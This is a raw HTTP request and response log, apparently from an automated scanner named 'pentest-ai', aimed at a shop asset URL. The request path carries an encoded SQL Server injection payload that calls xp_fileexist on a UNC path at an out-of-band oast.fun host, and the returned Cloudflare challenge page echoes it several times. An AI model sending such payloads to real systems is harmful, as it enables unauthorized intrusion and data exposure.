REQUEST:
GET https://my.myfirst.tech//my.myfirst.tech/cdn/shop/t/%27%3B%20DECLARE%20%40q%20VARCHAR%2899%29%3B%20SET%20%40q%3D%27%5C%5Ch0cqg45t8jh21623dc0zv3umxqpd07eho.oast.fun%5Ca%27%3B%20EXEC%20master.dbo.xp_fileexist%20%40q%3B--%20-/assets/component-totals.css
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 10004
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8477d2d9fa110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=VgPXAeWTBs91A%2BT3oLFivnBPragyU5livvdg4tst3OeABjNGDyJL2iWAydP9cDj6FOm%2BHt%2BUqya3%2Bs5aWmPTdblTr%2BMebL%2FWCOtHrSQy%2FGrx9e1QBfWljo1l%2B8d%2BnXRdOA%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8477d2d9fa110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: '3uDn8jAFdWFlzcVf5x.9tST1JZcAIMYc3tVpexiYDDo-1784281164-1.2.1.1-Knb83fYl7gqayZYaApO7lIF3E9k2GW4DXV940Oa2V5pgUMiDRzmSO8sJdkIPK8hb',cITimeS: '1784281164',cRay: 'a1c8477d2d9fa110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/my.myfirst.tech/cdn/shop/t/';%20DECLARE%20@q%20VARCHAR(99);%20SET%20@q='%5C%5Ch0cqg45t8jh21623dc0zv3umxqpd07eho.oast.fun%5Ca';%20EXEC%20master.dbo.xp_fileexist%20@q;--%20-/assets/component-totals.css?__cf_chl_tk=hL6vcAb469SZPCCjzwcsZauBvNjiA00kvqjVzeZDXQk-1784281164-1.0.1.1-Wt6D6eF6mdbdv_zlGDKcy9pGPQl1gI5NEgSS4AuFTG0",cvId: '3',cZone: 'my.myfirst.tech',fa:"/my.myfirst.tech/cdn/shop/t/';%20DECLARE%20@q%20VARCHAR(99);%20SET%20@q='%5C%5Ch0cqg45t8jh21623dc0zv3umxqpd07eho.oast.fun%5Ca';%20EXEC%20master.dbo.xp_fileexist%20@q;--%20-/assets/component-totals.css?__cf_chl_f_tk=hL6vcAb469SZPCCjzwcsZauBvNjiA00kvqjVzeZDXQk-1784281164-1.0.1.1-Wt6D6eF6mdbdv_zlGDKcy9pGPQl1gI5NEgSS4AuFTG0",md: 'AA80hOJlWp9vjQT_IMrt0.vvwUUAjmJKWT_Ei0L5MyE-1784281164-1.2.1.1-iV59Qjfm4kkGeG1LW6gMaBoXwsuvBsw_HtMzIsODCN97oarQ2X6RiBgZxUqz9JK3In0FY5zqXtg1pruH18HQXPHYhOCu9fCuFNwXsjxY9P.dTbusZUOBIuwgPsLxYDtNyXLM796qQH1W9HBoXRj_q8lqy9Eus3L8GjjCVSAZf26Jeiv04oM.VKI0V8jK0Xa8Kp8RZJocpjCvzE5mvhxSdR237jqVIyFSMRO..kAiojLVhA0HDBLpjXzBFr.BndCE2TW_meSaExt8DhOW10jvjFnovra0q8RsOtVcsf1KlAGXz6MmD23.ri81kMcDytjB7lco1.0k8Tq6jYe2dQnksNARarPQkIkqqB1FTskSSMnMUI42ALzLCOEYxff4tulKlPsXdr3f.lKXuBdvQLYJP28NCutG_zJJgSP7hwz5XAR2JsqCCM2Mf0rRqnbrXNCrJgiNBD5zrEuQAz63QQHv1TZtovG3P7MHsAYwXXFYQtbQlVyY.LRnsaNG6BzK0tE3JIXwUcBkIj0nRsfNZa9uuhlODAknmETCuexLTdO.NO95KIgT7o1aBXwlBjjOuRxObxtxDaDKPdQxcYgMM4W35CXXgVXVSUBDG9KD74EQ2wVp9s61up6Vyi68IimaEn0ip3JupdKgLh5jqlvvY.ycahEolu1dBEtuaE6yi9B8Q0gJKPjEE23WYyoeuGM9YrLY1zFj9FUjlzsT5EzYzDfCukx.ytlrSykxRh8U1grONAeZQqSjHl0UPBCLsCpLUCP78IDn5oA7RP8kEYe.XmZ3fs9zgV7k1473.5oDb6wVMoD5IH6l97EEZol.p2PaP2Yz7QWtRwMvKncp6JkCQa5S1LmkQKoiNJDTYQsN15XHzBAU72nbNgAFo4B1ygmLtbdCyY_O3wmoaHefX1hQk9UQO4DlbTHBH88Ar83LZVjlYrm1GN3bM.eTVgbWvzTxDN7wpquWb1AzHiv2ovh3ws22g.X6zXAbMdQtYr0Dhk6gUMCTCDMMfsrH8jMHBVh.g8qTzia8dUpl0K0FT0vNmx7nYhXgebEpTkPQQNfk0INZjt7vxN5G._7IwIG4_PFdb43zXxUgOIiwZcfikfqFr9hFr86jK5_OUeR6CpR5PPKAnpcKWlHor28HwQOMab7nXKIYjBHxmQ2jJqq26mS9tPFntwm57Nql6LZK5A2HaIicxrEOV7XHt5V.YhQP0aFY_NgdC4OKWvAbW2GcWyebyDm0O_wcp7q3l9uu91fas2YXha6tbAozcT4b6ulm4ZhAiEbIsLG._BGvXuXroTuu58hs9fQ6V7BkdWuhIdKD_GVhbDZfpTujcHNqinJJ71kFUnLSKdw3ihyz1DqWi8nv2bgP7kMfAExvtrhUjQfL9mTZtR93gen63hAMBjNJRIegxGZq',mdrd: '6pFUzKWqiC.P6JrNmtLBpn7dT1tvnR4P3txvza.6M94-1784281164-1.2.1.1-CiXecCGXr5sNnhOedgE.d8LltbbvMtSDkzZwOStwsWZ2YE1kW6U52vH01vGVdsbKtZmf4lu5u1jC120N4BrlIE7jn_qh0zqQUwRGST8CL.YWffMtySgPrSWsKnGoTAPvWDqYVQj5nyb1LUf2iHIOVwH9UK86zBRjR8avF.vPtBQZFznZREBO4baA7LF9Gc4qo3GqWlh2iAWcKWrt3iLs_LE3PSRCjr_KVTzwmvxf.FXr5VbefqOFB5CHMQ7BqONj',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8477d2d9fa110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/my.myfirst.tech/cdn/shop/t/';%20DECLARE%20@q%20VARCHAR(99);%20SET%20@q='%5C%5Ch0cqg45t8jh21623dc0zv3umxqpd07eho.oast.fun%5Ca';%20EXEC%20master.dbo.xp_fileexist%20@q;--%20-/assets/component-totals.css?__cf_chl_rt_tk=hL6vcAb469SZPCCjzwcsZauBvNjiA00kvqjVzeZDXQk-1784281164-1.0.1.1-Wt6D6eF6mdbdv_zlGDKcy9pGPQl1gI5NEgSS4AuFTG0"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
